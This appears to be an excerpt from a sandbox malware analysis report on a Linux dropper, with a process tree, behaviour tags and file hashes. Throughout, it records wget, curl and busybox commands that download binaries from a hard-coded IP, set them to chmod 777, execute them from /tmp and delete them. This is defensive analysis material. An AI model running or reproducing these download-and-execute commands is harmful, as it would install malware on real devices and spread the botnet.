/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:1658
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1661
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:1664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1667
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:1670
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1671
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Writes file to tmp directory
PID:1672
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1673
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:1674
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:1675
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:1676
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1677
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Writes file to tmp directory
PID:1678
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1679
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:1680
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:1681
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:1682
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1683
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Writes file to tmp directory
PID:1684
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1685
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1686
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1687
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1688
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97